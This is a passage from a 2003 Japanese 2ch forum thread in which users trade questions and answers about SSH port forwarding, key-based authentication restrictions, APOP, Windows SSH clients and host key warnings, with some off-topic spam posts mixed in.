PCとプロバイダのメールサーバとの間でsniffされる可能性は低いと考えると、
メールソフトがPGPに対応していればとりあえず安心できるのかも。

537 :534:03/01/04 05:59
うーむ、やっぱ普通はないですよね。
パスワードたれ流しは仕方なしか。

538 :534:03/01/04 06:02
>>536
多少スレ違いですが、 apop の暗号は強固なものなんでしょうか。

539 :名無しさん@お腹いっぱい。:03/01/04 06:23
>>538
正確に言うと、APOPはパスワードを暗号化するっーより
md5でパスワードのハッシュ(指紋みたいなもの)を取ってそれを合わせてる。
だからパスそのものは流してはいない。

ちなみに、SSHの認証鍵方式もハッシュを流してたんじゃなかったけか?

540 :名無しさん@お腹いっぱい。:03/01/04 06:56
APOPはオートだけどPGPはオートとまでは行かず、めんどくさい。

541 :名無しさん@お腹いっぱい。:03/01/04 12:44
pop3s(port 995)ってはやってないのかな......

542 :名無しさん@お腹いっぱい。:03/01/04 13:10
>>540 そんなことないです。

543 :名無しさん@XEmacs:03/01/04 14:21
>>539
> 正確に言うと、APOPはパスワードを暗号化するっーより
> md5でパスワードのハッシュ(指紋みたいなもの)を取ってそれを合わせてる。

『正確に言うと』と書くんなら本当に正確に書かんと。本当にパスワー
ド*のみ*のハッシュを取ってるだけなら容易に replay できちゃう
からまったく意味なし。

で、強度という点では、大概はパスワードに引きずられるから、まぁ
よくて 30〜40bit のエントロピーってとこかしら。辞書攻撃できるよ
うなパスワード使ってたら challenge&response のサンプル数個です
ぐに破れちゃうだろうね。

> ちなみに、SSHの認証鍵方式もハッシュを流してたんじゃなかったけか?

SSH1 の RSA 認証ならたしかにハッシュを使っているけど (この辺り
に関しては前スレに解説あり)、SSH2 の公開鍵認証は全然違う。


544 :名無しさん@お腹いっぱい。:03/01/10 03:11
java SSH2 terminal emulater だって。
http://wiredx.net/jcterm/


545 :名無しさん@お腹いっぱい。:03/01/10 08:20
ttps://www.netsecurity.ne.jp/article/2/8164.html
(((;゚Д゚)))ガクガクブルブル


546 :名無しさん@お腹いっぱい。:03/01/10 23:06

 T h e o 必 死 だ な (藁


547 :名無しさん@お腹いっぱい。:03/01/11 12:16
MICKEY MOUSE HACKING SQUADRON って誰なんだ?

548 :名無しさん@お腹いっぱい。:03/01/12 17:27
Windows2000 → FreeBSD4.7R で ssh を使って接続しています。
ところが、最近表示が詰まるようになってしまいました。
画面の上から 10 行目あたりで一度止まって残りが表示される感じです。
(ちょっと昔に ssh 対応 の TeraTerm3 が発表され、この板の住人で
使った人が"なんか表示が詰まらない?" のような感じに表示がなります。)

何が原因なのか

Putty ssh
Putty telnet
TeraTerm (telnet)
ttssh (ssh)

でそれぞれ接続してみたところ、 ssh で接続した時にこの現象が出るようです。
最近、 ssh 関係の設定もハードウェアも変えていません。ロードアベレージも
限りなく 0.00 に近いです。
何か心辺りがある方は御一報下さい。

sshd version OpenSSH_3.4p1 FreeBSD-20020702


549 :名無しさん@お腹いっぱい。:03/01/12 18:08
>>548
Compression no とか?

550 :名無しさん@お腹いっぱい。:03/01/12 21:08
OpenSSHにセキュリティホールがあったという事件で、
SSH系は、すっかり信用を落としてしまいましたね。
もっと単純明快なソフトの書き方にしないかぎり、
これもまた常にもうひとつバグがあるの繰り返しかな。
SSHのバグはこればかりじゃなくて過去にも何度も
出ています。

それにしても、そろそろUNIXに最初から裸のTELNETとか
FTPとかR系コマンドとかSENDMAILが入らなくなって
しかるべきで、これらのコマンドはあっても必ず、
マシン外部から出て行くときにはパケットが暗号化
されるようにはやくなりませんかな。

551 :名無しさん@お腹いっぱい。:03/01/12 21:21
telnetは問題ないだろ。つーか、無くなると手でポート叩く時に困る。

552 :名無しさん@お腹いっぱい。:03/01/12 21:45
典型的なFUDですな。

553 :名無しさん@お腹いっぱい。:03/01/12 21:50
>550はFUD
550はDQN

554 :名無しさん@お腹いっぱい。:03/01/12 22:14
(´-`).。oO(>>550にSENDMAILが入っているのはなんでだろ?)

555 :名無しさん@お腹いっぱい。:03/01/12 23:05
>>550
どこからのコピペ?

556 :548:03/01/12 23:15
>>549
Compression no
を/etc/ssh/sshd に追加後、kill -HUP sshd して再接続しましたが変化ありませんでした。

557 :548:03/01/12 23:34
NIC の Driver 入れ直したら改善して模様。

558 :名無しさん@お腹いっぱい。:03/01/13 06:35
ssh のポートフォワードの機能だけを使わせたい素人の友人がいるのですが、怖いのでシェルは使わせたくありません。
どうでもいい IDをつくってログインシェルに
ssh -R port:host:hostport #ssh のポートフォワードの自動実行
alias *=exit # 何かキーを押したらログアウト

見たいな記述をしておけば、IDとパスワードを教えても大丈夫でしょうか? というよりこの状態でイタズラできる方法ありますかねぇ?

559 :名無しさん@お腹いっぱい。:03/01/13 07:22
>>558 も素人。


560 :名無しさん@お腹いっぱい。:03/01/13 08:35
>>558
ログインシェル変えればいいじゃん。

561 :名無しさん@お腹いっぱい。:03/01/13 08:46
>560
alias で * とかなってんじゃないの?

>558
サーバー側でポートフォワードを許す設定になっているなら putty とかでログイン時にイタズラできない? 
ftp とか netbiosとか sambaにポートフォワードする設定にしてログイン。 その後 samba にアクセスとか。
てーかSSHがあれば対象のIPさえわかれば LAN内のどこにでもポートフォワードでアクセスできると思われ。

562 :名無しさん@お腹いっぱい。:03/01/13 09:04
ログインできないようにしてpermitopenを使えばよろしいね。

563 :558:03/01/13 09:31
>561 >562
なるほど。 そんなこともできるんですね。 怖い怖い。
とりあえず試してみたのですけど alias の記述で * は認めないみたいなのでどうしたもんだろって感じです。
PATH を何にも通さなくして ~/ にexit だけを置いてみたんですけどやっぱり誰かが /bin/ とか絶対番地入力に気がつくだろうなぁ・・・

564 :名無しさん@お腹いっぱい。:03/01/13 09:40
「番地」って、、、(;´Д`)

565 :名無しさん@お腹いっぱい。:03/01/13 10:00
>>562
no-x11-forwarding,no-agent-forwarding,no-pty あたりもあったほうがよいでしょうか?


566 :562:03/01/13 10:13
>>563
ぜんぜんわかってないご様子ね。やめたほうがいいっす。
今までのことはすべて忘れて windows を使っててください。

>>565
-NをつけてればagentもXも転送されないので、とくにつける必要ないです。
ログインできなければptyも関係ないし。

567 :558:03/01/13 10:46
>562
わかってないけど忘れるのは無理。
とりあえずもっと勉強してきます。

568 :初期不良:03/01/13 14:27
>>567
stunnel の方がいいんでないのかい

569 :名無しさん@お腹いっぱい。:03/01/13 15:53
zebedee






と言ってみるテスト

570 :山崎渉:03/01/15 12:53
(^^)

571 :名無しさん@お腹いっぱい。:03/01/16 19:49
authorized_keysでcommadn="command"の制限をしたいとき,
実行したいコマンドが複数ある場合どうすんの?

# dump -0 -a -f - /home | ssh -l user server "cat | gzip -c > /path/home.gz"
# dump -0 -a -f - /usr | ssh -l user server "cat | gzip -c > /path/usr.gz"
とかいうのをしたいのよね。


572 :名無しさん@お腹いっぱい。:03/01/16 21:56
>571
暗号化せず、日本語で書いてください

573 :名無しさん@お腹いっぱい。:03/01/17 12:18
>>572
> >571
> 暗号化せず、日本語で書いてください

意味不明。
日本語を書くこと。

574 :名無しさん@お腹いっぱい。:03/01/17 12:22
>>573
なんだコイツ、日本語で書けよな。

575 :(;´Д`)ハァハァ:03/01/17 14:07
572 はネタのつもりだったんじゃない? 一応暗号化関連のスレだし。

576 :(;´Д`)ハァハァ:03/01/17 15:55
上の方にでていたTeraTerm のSSH2対応版を使っているのですがポートフォワードができなくて困ってしまいますた。
で、TTSSHだとできるのに・・・ 誰かできた方はいますか?

577 :名無しさん@お腹いっぱい。:03/01/17 16:34
ねぎマンセー!!ねぎマンセー!!ねぎマンセー!!ねぎマンセー!!ねぎマンセー!!
ねぎマンセー!!ねぎマンセー!!ねぎマンセー!!ねぎマンセー!!ねぎマンセー!!
ねぎマンセー!!ねぎマンセー!!ねぎマンセー!!ねぎマンセー!!ねぎマンセー!!

578 :名無しさん@お腹いっぱい。:03/01/17 17:40
解読できません。

579 :名無しさん@XEmacs:03/01/17 17:59
>>571
> authorized_keysでcommadn="command"の制限をしたいとき,
> 実行したいコマンドが複数ある場合どうすんの?

実行したいコマンド毎に別の鍵ペア用意して -i で使い分ければ?


580 :名無しさん@お腹いっぱい。:03/01/17 18:12
windows機でsshサーバをたちあげようとする時、現状では
cygwinしか選択肢は無いのでしょうか?
ぐぐってみても、windows用はクライアントしか引っかからない…

581 :名無しさん@お腹いっぱい。:03/01/17 18:15
>>580
ssh.com にはないの?

582 :名無しさん@お腹いっぱい。:03/01/17 18:17


http://www.agemasukudasai.com/bloom/

583 :名無しさん@お腹いっぱい。:03/01/17 18:17
>>580
有料のとかあったはず

584 :580:03/01/17 18:31
どうもありがとうございます
>>581
>>583
すみません、できれば無料のを探しているのです…
ssh.comのは評価版なんですよね?むむむ…
おとなしくcygwinを入れた方が良いのかな?
Diskがやばいのでなるべく小さなのを入れたかったのですが…
もう少し探して見ます。どうもありがとうございました。


585 :571:03/01/17 19:55
>>579
ども。その手があったか。


586 :名無しさん@お腹いっぱい。:03/01/19 11:37
>>584
cygwin sshdの解説はここがわかりやすい。ここ見れば一発だ。
http://osksn2.hep.sci.osaka-u.ac.jp/~naga/miscellaneous/winssha.html

587 :名無しさん@お腹いっぱい。:03/01/19 13:34
>>586
そのサイト、あちこちに気になる記述が。

588 :名無しさん@お腹いっぱい。:03/01/19 18:52
515的な発想なんだけど、
client---<ssh可能>---hostA
hostA---<大体のポートが開いている>---www(不特定のHOST)
の場合、つまりポートフォアーディングでウェブを参照したいとき、
やはり、proxyを経由じゃないとだめなんでしょうか?

wwwが特定のHOSTの場合は参照できることを確認済みです。
動的に転送先を変えるみたいなことはやはり不可能?


589 :588:03/01/19 18:58
もうひとつ質問させてください。
client---<sshのみ可能>---hostA ---<sshのみ可能>---hostB
のときhostBにポートフォアーディングしたときは
hostAでclientのポート22をhostBに転送し、clientにsshする。
(実際はhostBにsshすることになる)
その後、clientの任意のportをポートフォアードする。
これで一応可能みたいなんだけど、これって問題ない?



590 :名無しさん@お腹いっぱい。:03/01/19 19:30
>>588-589
??
要点を整理して書き直してください。

591 :588:03/01/19 20:16
上にあるように
client% ssh hostA -L 8080:www:80
して、ブラウザ側で
http://localhost:8080/
で特定のHOSTはOKなのですが、これを不特定にしたい。
つまりwwwを動的に書き換えたい。
普通に考えれば
client% ssh hostA -L 8080:proxy:8080
としてブラウザのプロキシをproxy:8080にすれば可能だと思います。
proxyサーバ経由しない方法ってないですか?
やっぱり無理ですよね?



592 :589:03/01/19 20:21
client% ssh hostA -L 23:hostB:23
とした後、
client% ssh localhost
でログインし
hostB%ssh localhost -L port:hostX:port
とします。
するとclientの任意のportをhostXに転送できるのです。
これ問題ない?


593 :bbb:03/01/19 20:22
http://www6.ocn.ne.jp/~endou/index2.html
     ★YAHOOOプロフィール★

594 :名無しさん@お腹いっぱい。:03/01/19 21:12
>>592 できない。

595 :名無しさん@お腹いっぱい。:03/01/19 21:14
>>591
そのままでは無理です。
hostAにsquid等のhttp proxyを立てられる権限を持っているなら、
proxyがlistenしているポートをclient側にforwardして、
clientのブラウザでforwardされたlocalhost:<port>をproxyとして指定すれば可能と思われます。

sshのみでhttpの接続先ホストを動的に変えるのはほぼ無理です。
どうやってhttpの接続先アドレスをhostAに渡すのか考えてください。


>>592
やはり意味不明です。
もう一度よく考えて書き直してください。

596 :588=589:03/01/19 21:37
>>595
591はproxy:8080をlocalhost:8080と間違えてかいてました。
 おっしゃるとおりにできることは確認ずみ。
 無理だと思うからあえて聞いてみたいんですけど。。
 動的にまではいかなくても、簡単に書き換えられるスクリプトでもあるかなと思って。。


 592は要するに2段先ののGWへポートフォワーディングしたいんですよ。
 もちろん、途中はsshしか許可されてない。
 ちなみにwinなひとなんで、592の表現は誤っていたかかも。
 こちらもできることは確認済み。
 ですが、セキュリティ的に問題あるかもとおもって確認してます。
 
 

597 :名無しさん@お腹いっぱい。:03/01/19 21:54
>>596
だいたい分かりました。
問題あるか無いかは管理方針によります。
もし危険だと思うならばport forwardを不許可にすべきでしょう。

あと -R オプションというのもあるので、そちらも man で読んでみてください。


598 :588=589:03/01/19 22:16
>>592は 23じゃなくて、22でSSHのポートの誤りです。
てか、TTSSHから想像で書いたので、後から見直すと間違ってる。。

>>597
ssh(22)をポートフォアーディングすることの危険性ってどういうことが
考えられます?
そりゃー、port forwardを不許可にすることが一番簡単なんですけど。。

599 :588=589:03/01/19 22:30
-R をどういう意図で出してきたのかわかりませんが、
リモート側でLISTENするのどういうときに使われるんでしょうね。
結構こわいですよね?

600 :名無しさん@お腹いっぱい。:03/01/19 22:56
.:*・:*・∵.☆:* ・∵.゜.☆.・∴.,★ :*・∵.:☆.。.:*・:* ・∵.+:*・∵.゜ ">*・.:.。.:*・:*・

∵.☆:*・∵.゜.☆.・∴.,★ :*・∵.:☆.。.:*・:* ・∵.+:*・∵.゜ ★
http://www6.ocn.ne.jp/~endou/index2.html
      ★こんなサイト見つけました★

601 :名無しさん@お腹いっぱい。:03/01/20 06:01
.:*・:*・∵.☆:* ・∵.゜.☆.・∴.,★ :*・∵.:☆.。.:*・:* ・∵.+:*・∵.゜ ">*・.:.。.:*・:*・

∵.☆:*・∵.゜.☆.・∴.,★ :*・∵.:☆.。.:*・:* ・∵.+:*・∵.゜ ★
http://www.momonga-linux.org/docs/OpenSSH-HOWTO/ja/index.html
      ★こんなサイト見つけました★

マジネタ。わかりやすくできてる。

602 :名無しさん@Emacs:03/01/20 14:23
>>601
> マジネタ。わかりやすくできてる。

ホントだ。
でも、そのスタイルで書かれると疑うよ。(W

603 :588=589:03/01/20 22:05
一応正確にかくと
client% ssh hostA -L 22:hostB:22
の後、
client% ssh localhost -L port:hostX:port
です。
もちろん、clientではsshdは起動してません。
こうするとhostBからしかアクセスできないhostXの任意のポートに
clientからアクセスできます。

604 :名無しさん@お腹いっぱい。:03/01/20 23:14
>>588
テケトーな荒業だけど、
www.google.co.jpあたりにフォワードして
google様のキャッシュを利用すればたいていのページは見れますよ

605 :名無しさん@お腹いっぱい。:03/01/21 00:05
>603
二重に暗号化される箇所があるけど、速度面以外は問題が無い。

606 :名無しさん@お腹いっぱい。:03/01/21 13:28
A営業所とB営業所の間をインターネット経由で結んで、
A営業所にあるLANにB営業所のLANがあたかも直接スイッチハブで
つながっている一つのLANであるかのようにネットワークを構築
したいのだけど、どうやればいいの? インターネットを通すので、
暗号化を加えるのにSSHを使いたいのだけど、A営業所とB営業所
の間のルーティング情報とか任意のプロトコルのパケットが
相互に通信できないと困るんですけども。

607 :名無しさん@お腹いっぱい。:03/01/21 13:34
>>606
http://www.google.com/search?lr=lang_ja&ie=eucjp&q=SSH+VPN+%B9%BD%C3%DB

608 :名無しさん@お腹いっぱい。:03/01/21 13:35
VPN 張りたいなら SSH にこだわる必要もないと思うが。

609 :名無しさん@お腹いっぱい。:03/01/21 14:06
トンネル通ったパケットの送信元アドレスを変えることってできない?
送信元がダイナミックに振られるppp0のアドレスになるから、アクセス制御が大変で。。。

610 :名無しさん@お腹いっぱい。:03/01/21 17:01
>>609
-b

611 :名無しさん@お腹いっぱい。:03/01/21 18:35
$ssh -L8080:host-a:8080 -b 192.168.0.1 host-a
bind: 192.168.0.1: Cannot assign requested address

とか言ってできない

612 :610:03/01/23 09:28
>>611
あぁ、トンネルの向こう側か。 man 眺めた限りだとちょっとわかんないや。スマソ

613 :名無しさん@お腹いっぱい。:03/01/23 19:07
keychainの--clearオプションの使い方がいまいち分かりません。

あまりログインしない鯖上で、rsync -e sshをcronで回すことを想定しているんですけども、
ttp://www-6.ibm.com/jp/developerworks/linux/011130/j_l-keyc2.htmlによると
こういった場合、--clearを使うとなにか効用があるような感じなんですが、具体的には
どうすればいいんでしょうか。


614 :名無しさん@お腹いっぱい。:03/01/24 02:40
sshd は inetd 経由でなくても
hosts.allow, hosts.deny を参照するようですが、
普通これらのファイルは inetd 用であるという認識であってますか?

615 :名無しさん@お腹いっぱい。:03/01/24 03:32
>>614
いいえ。 libwrap (tcpwrappers) 用です。 OpenSSH はデフォルトでリンクしてます。
inetd も、libwrap をリンクしていなければ /etc/hosts.* を見ませんよ。

616 :614:03/01/24 04:07
>>615
なるほど。勉強になりました。
ありがとうございます。

617 :名無しさん@XEmacs:03/01/24 10:07
>>613
> keychainの--clearオプションの使い方がいまいち分かりません。

過去スレ (http://pc.2ch.net/unix/kako/976/976497035.html)
693 においらの理解は書いといたけど、あんな程度のもんじゃなかろ
か。

だもんで、command= で利用制限した passphrase なし秘密鍵使う方が
マシだと思う。


618 :613:03/01/25 10:19
過去スレを読むのを怠っていました。どうもすいません。

--clearの効用、よく理解できました。
使い方が分からず、何時間か悩んでいたんですが、いざ分かってみると、
かなり拍子抜けしました。
# もっと「すごい」機能を想像していたんですが。

> だもんで、command= で利用制限した passphrase なし秘密鍵使う方が
> マシだと思う。

そのようですね。こちらの方法で試してみたいと思います。


619 :名無しさん@お腹いっぱい。:03/01/27 00:03
ssh -o monster

620 :名無しさん@お腹いっぱい。:03/01/28 04:46
WinSCP 2.2、βが取れたみたいだから入れてみたけど、めっちゃ重いね。

621 :名無しさん@お腹いっぱい。:03/01/28 23:23
素直にsftp使うよろし

622 : :03/01/31 23:22
tera termは偉大なり。
だれか、TTSSHに代わるものつくってちょ!

623 :名無しさん@お腹いっぱい。:03/02/01 00:44
>>622

PuTTY じゃなんでダメなの?

624 :名無しさん@お腹いっぱい。:03/02/01 00:46
putty っていやらしくない?
tty ですでにいやらしいけど。

625 :名無しさん@お腹いっぱい。:03/02/01 01:17
いやらしくないのがいいんですか?

626 :名無しさん@お腹いっぱい。:03/02/01 02:58
パテのどこがいやらいいんだ?

627 :名無しさん@お腹いっぱい。:03/02/01 03:40
ぷっちぃ


628 :名無しさん@お腹いっぱい。:03/02/01 09:46
ピア=マルコ




なつかすぃ〜(藁

629 :622:03/02/01 10:40
TeraTerm のマクロが結構あんのよ

630 :名無しさん@お腹いっぱい。:03/02/01 11:35
TeraTermでローカルのCygWin/sshdにログイン。
そっから好きなとこいけ。

631 :名無しさん@お腹いっぱい。:03/02/01 13:37
>>630
ローカルへ、のときにssh使う意義って何?

632 :名無しさん@お腹いっぱい。:03/02/01 14:16
自動化が楽。

633 :名無しさん@お腹いっぱい。:03/02/01 20:09
てらりん☆あげ

634 :名無しさん@お腹いっぱい。:03/02/20 14:40
ホストが3つあって
ローカルホストAにはAで生成した秘密鍵が。
リモートホストBにはAの公開鍵とBで生成した秘密鍵が。
リモートホストCにはBの公開鍵が置いてあるがAの公開鍵はない。
Aの秘密鍵とBの秘密鍵のパスフレーズは同じ。

こういうときにパスフレーズを一回しか打たずにCに入る方法(あるいはソフト)ってありますか?
rootナシで動くソフトならBにインストールしておけるという条件で。

もしよい方法がありましたら教えてください。お願いします。

635 :名無しさん@お腹いっぱい。:03/02/20 15:00
あるわけないでしょ。鍵が違うんだから。

636 :名無しさん@お腹いっぱい。:03/02/20 15:33
>>634
2段階のログインがいやなら
ssh B ssh C
でどうよ。
パスフレーズは2回打たなきゃいけないけど
コマンド1つで済む。
試してないけど。

637 :590:03/02/20 16:24
■■わりきり学園■■

コギャルから熟女まで

素敵な出会い

ゲイ、レズビアンなどコンテンツ豊富

http://www.geocities.jp/kgy919/deai.html









638 :634:03/02/20 21:40
うーむ。ダメですか。
エージェントみたいなのにパスフレーズを記憶させて、
パスフレーズの入力時に勝手に送信してくれるようなソフトはないですかね。
空パスフレーズよりは少し堅いかと思ったのですが。

>>636
ssh -t B ssh C
ならできました。けど、やはりこれを省略したい……。

639 :名無しさん@Emacs:03/02/20 23:42
>>634
ホストCにAの公開鍵をおけば?

640 :名無しさん@Emacs:03/02/21 18:30
>>634
>>639
ほんで、エージェントフォワードを認めればよい

641 :634:03/02/21 21:13
>>639,640
いや、エージェントフォワードもポートフォワードもしない方法を探していたんですよ。
まぁ、なさそうなので諦めます。

642 :名無しさん@お腹いっぱい。:03/02/21 21:18
>634
パスフレーズ無しの鍵を利用する

上5行とは矛盾しないが、

643 :名無しさん@お復いっぱい。:03/02/24 11:53
>>634
ホストB の ~/.ssh/authorized_keys に
no-X11-forwarding,no-agent-forwarding,command="/path/ssh ホストC" ホストAの公開鍵
って書けば。
ホストA で,
ssh ホストB
とすると自動的に(ry

644 :名無しさん@お復いっぱい。:03/02/24 11:55
追加。
そういや no-port-forwarding オプションもあった。

645 :名無しさん@お腹いっぱい。:03/03/06 12:50
RHL8.0 入れたら RHN7.3 からの slogin がエラーが出て繋がらなくなりますた
サーバで素で入れたまんま。ファイアーウォールはお互い張っていません。

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
cb:9b:76:69:30:0f:96:68:d1:7d:17:a6:3d:54:79:31.
Please contact your system administrator.
Add correct host key in /root/.ssh/known_hosts to get rid of this message.
Offending key in /root/.ssh/known_hosts:3
RSA host key for 192.168.160.251 has changed and you have requested strict check
ing.
Host key verification failed.


646 :名無しさん@お腹いっぱい。:03/03/06 12:56
見たとおり、相手方のサーバ鍵が変わっている、成りすましの可能性もあるから
確認せよってこった。

647 :名無しさん@お腹いっぱい。:03/03/06 12:56
>>645
正常な動作だと思いますが。


648 :645:03/03/06 13:30
するとサーバ鍵を再生成すれば良いんでしょうか・・・?
ってか初めての接続で怒られてる・・・あ、再インストで同IP使ってる・・・
それが原因でしょうか。ってことは認証をもう一回張り直せばOK?

649 :名無しさん@お腹いっぱい。:03/03/06 13:34
つーか、ssh の動作をぜんぜんわかってないみたい。
telnet でも使えば?

650 :名無しさん@お腹いっぱい。:03/03/06 13:38
>>648
黙って英文読めって。
読めなかったら、その英文の一部をぐぐれ。

651 :名無しさん@お腹いっぱい。:03/03/06 16:28
>>634
ホストAとホストBのsshがSSH Secure Shellなら、パスフレーズがある場合でも

eval `ssh-agent`
echo PASSPHRASE | ssh-add -p
ssh -t B "eval \`ssh-agent\`;echo PASSPHRASE | ssh-add -p;ssh C"

みたいなのをスクリプトに書いてPASSPHRASEの部分を一度だけ入力させるようにすれば、実現できる。

OpenSSHだとssh-addに-pオプションはないみたいですが、
どうしてないんでしょう? 危険なんでしょうか? >詳しい方々

652 :名無しさん@お腹いっぱい。:03/03/06 22:41
>648
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ なんのために強調してると思ってるんですか? @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

653 :名無しさん@お腹いっぱい。:03/03/06 23:02
I have something wrong with >>652.
I just executed it, but it does't work well.
What should I do?

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ なんのために強調してると思ってるんですか? @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@



654 :名無しさん@お腹いっぱい。:03/03/06 23:09
呪われた虐 (ry

655 :名無しさん@お腹いっぱい。:03/03/06 23:24
警告: リモートホストの同一証明は変わった!
誰かが厄介な何かをしていることは可能である!
誰かはあなたで今盗み聞きできる( 人中間の攻撃)!
RSA のホストのキーがちょうど変わったことは可能またである。
RSA のための指紋はリモートホストによって送られてである
cb:9b:76:69:30:0f:96:68:d1:7d:17:a6:3d:54:79:31
調整する。あなたのシステム管理責任者に連絡しなさい。
このメッセージを取り払うために正しいホストのキーのの
/ root/.ssh/known_hosts 加えなさい。
192.168.160.251 のためのおこる主で
/ root/.ssh/known_hosts:3
RSA ホストのキーは変わり, あなたは厳密な点検を要求した。
ホストの主証明は失敗した

http://babelfish.altavista.com/

656 :名無しさん@お腹いっぱい。:03/03/07 05:28
みんなやさしいね。

657 :名無しさん@XEmacs:03/03/07 13:20
>>651
> OpenSSHだとssh-addに-pオプションはないみたいですが、
> どうしてないんでしょう? 危険なんでしょうか?

まぁ、$SH のやつが実装しているというなら、直接的なセキュリティ
ホールってことはないんでしょうが。気になるとすれば、こういう機
能を付けてしまうと passphrase を直にベタ書きした script の類が
書きやすくなってしまうかも、って程度かしら。

-p なしでも、expect とか使えば似たよなことはできちゃうので必要
を認めずってことかもしれないし。


658 :名無しさん@お腹いっぱい。:03/03/07 13:56
>>648
コンサル(ry

スレ違いsage

659 :名無しさん@お腹いっぱい。:03/03/11 11:05
-fでバックグランドジョブを投入すると標準入出力が/dev/nullにリダイレクトされてしまうけど、
これを避ける方法はありますか?

やりたいこと:
マシンB,C間でsshで接続したバックグランドジョブを動かしたい。
ssh-agentはマシンAで動かし、マシンAからsshでマシンBにコマンド(B,C間のsshジョブ)を投入する。
マシンBで起動するコマンドをnohup ssh C ..... &などとすると、このsshがssh-agentから秘密鍵
を読む前に、マシンAで最初に投入したsshが終了してしまい認証できない。
今はnohup ssh C...&したあとに適当な時間sleepしてるけど、これはダサい。

660 :名無しさん@お腹いっぱい。:03/03/11 22:52
すみません、ちょっと挫折しかけてるので質問します。
host-A:25----host-B:25----host-C:25
というふうに2重にssh-portfowardingして実質的に
host-A:25----host-C:25
にするにはどのようにすればいいのでしょう?
host-B(Linux)の~/.ssh/authorized_keysの鍵の頭に
command="ssh host-C"とか書いて、host-A(windows)のPortforwarderで
チャレンジしましたけどhost-Cまでたどり着けませんでした。
もちろんhost-Aからhost-B、host-Bからhost-Cにsshが通るのは確認済みです。
sshの偉い方、よろしくお願いします。

661 :名無しさん@お腹いっぱい。:03/03/12 03:12
そろそろTeraTermがSSH2に対応しそうです。

662 :名無しさん@お腹いっぱい。:03/03/12 18:44
>>661
これのこと?
http://www.ayera.com/teraterm/


663 :名無しさん@お腹いっぱい。:03/03/12 19:15
SSH2使いたい人はとうの昔にPuTTYに乗り換えたからなぁ。
とはいえ、端末エミュレータとしてはTeraTermのほうが安定性とか
日本語まわりとかで優れている点も多いんで、いまさら無意味という
わけではないけど。

664 :名無しさん@お腹いっぱい。:03/03/12 19:32
ぐぐってみると、TTSSH2 なんてのを作ってる方がいたみたいだけど、
今はどんな感じなんでしょ?
>>661 さんの言ってるのはそれのことなのかしら?

665 :名無しさん@お腹いっぱい。:03/03/12 20:51
>663
> 端末エミュレータとしてはTeraTermのほうが安定性とか
> 日本語まわりとかで優れている点も多いんで

そうか?
putty の方が多機能だし日本語処理も「正しく」やっているし (iso-2022 patch の話だが)
マクロはまた別だが

666 :名無しさん@お腹いっぱい。:03/03/13 00:05
putty ってシリアル端末として使えたっけ?
TeraTerm は ZMODEM over SSH でファイル転送なんて技もできるし。

667 :名無しさん@お腹いっぱい。:03/03/13 00:17
PuTTY: A Free Win32 Telnet/SSH Client
http://pc.2ch.net/test/read.cgi/unix/1014702733/

くらいあんとのはなしわ

668 :名無しさん@お腹いっぱい。:03/03/13 04:29
>>661に繋がらないのだが、俺だけ?
直接SSH2を喋れるTeraTermほすぃんだけど...。


669 :名無しさん@お腹いっぱい。:03/03/13 04:30
間違えた。>>662でつ。



670 :i@am@z:03/03/13 05:02
おい、それから言葉使いなんとかしろよ、ハッカー気取りのホウケイ!
初心者の皆さん、(っても僕も6荷月児ですが)上のような馬鹿には気を
つけましょう。この手はいっぱいいます。外人さんの方がいい人多いですよ。

671 :名無しさん@お腹いっぱい。:03/03/13 05:04
教えてくれ。

672 :名無しさん@お腹いっぱい。:03/03/13 05:09
質問。
外のマシンにopensshのデーモンをtcpwrapperオプションつきであげてるんだけど、
inetdのhost.allowを動的にコントロールする方法ないかなぁ?
YahooBBなんでsshd: .bbetc.net、つーのもちょっと怖いんで、DDNSみたいな感じで
別んとこからコントロールできたらな、と。(それも怖いけど)

時に2ch対策でYahooBBが希望者の逆引きをybb.ne.jpかなんかにするって話あったよね?
あれの申し込みはどうやるの?


673 :名無しさん@お腹いっぱい。:03/03/13 05:37
>>672
> inetdのhost.allowを
意味分からん。

つーか、何をキーというかトリガーにしてコントロールしたいん?

漏れなら、SSH なんだからきっと大丈夫やろ、と思ってどっからでも許可にしちゃうが。

674 :672の母です:03/03/13 07:31
この度は息子がわかりづらい質問をして申し訳ありません。
恐らく息子はこう言いたかったのだと思います。

質問があります。

レンタルサーバ上で sshd を inetd 経由で立ち上げるようにしています。

自宅のISPは YahooBB です。自宅のPCのIPアドレスが変わったときに
それを検知して何らかの方法でレンタルサーバ上の /etc/hosts.allow を
書き換えたいと思っています。何かいい方法はないでしょうか?

 sshd: .bbbetc.net

としておくのはちょっと怖い気がします。

以下は略します。

ところで私自身は tcpserver なのですが、同様なことを考えたことがあります。
私の場合はcronで自分(自宅サーバ)のIPアドレスをチェックし、変わっていたら
sshdサーバ宛にメールを送信し、その発信元アドレスを接続制御データベースファイルに
書き出すようにしていました。

ただ自宅サーバをルータ兼用にしていたときは上記でよかったのですが、
ブロードバンドルータを導入したため、自宅サーバからWAN側のアドレスを
調べることができなくなってしまいました。

私のような場合はどうしたらよいのでしょうね?

至らない親子で申し訳ありませんが、何卒よろしくお願いします。

675 :名無しさん@お腹いっぱい。:03/03/13 07:48
>>674
どこからでもつながるsshdは怖がるのに、IPアドレスをメールで送るのは
平気というのはどういうことかと思います。PGPでも使っていたんですか。

- メールを信じるのであればReceived:ヘッダかメールログを解析して
接続元のグローバルIPアドレスを取得すればいいと思います。でも
この方法だと通信路を盗聴できる第3者にメールをまるごとキャプチャ
されて、その時と同じIPアドレスを取られたときに無意味になりますね。

- 最近のルータはWebインタフェイスがついていると思うので、
CurlみたいなHTTPクライアントを使ってbasic認証を喋らせて
取得IPアドレスを読むようなスクリプトでも組めばいいと思うです。

676 :672の母です:03/03/13 08:11
>>675
ちょっとだけ補足しておきますと、
SMTP over SSL でつないでおりました。
本文などにはIPアドレス自体は記述しておりませんでした。
Received を解析するのはさすがに採用しかねますね。

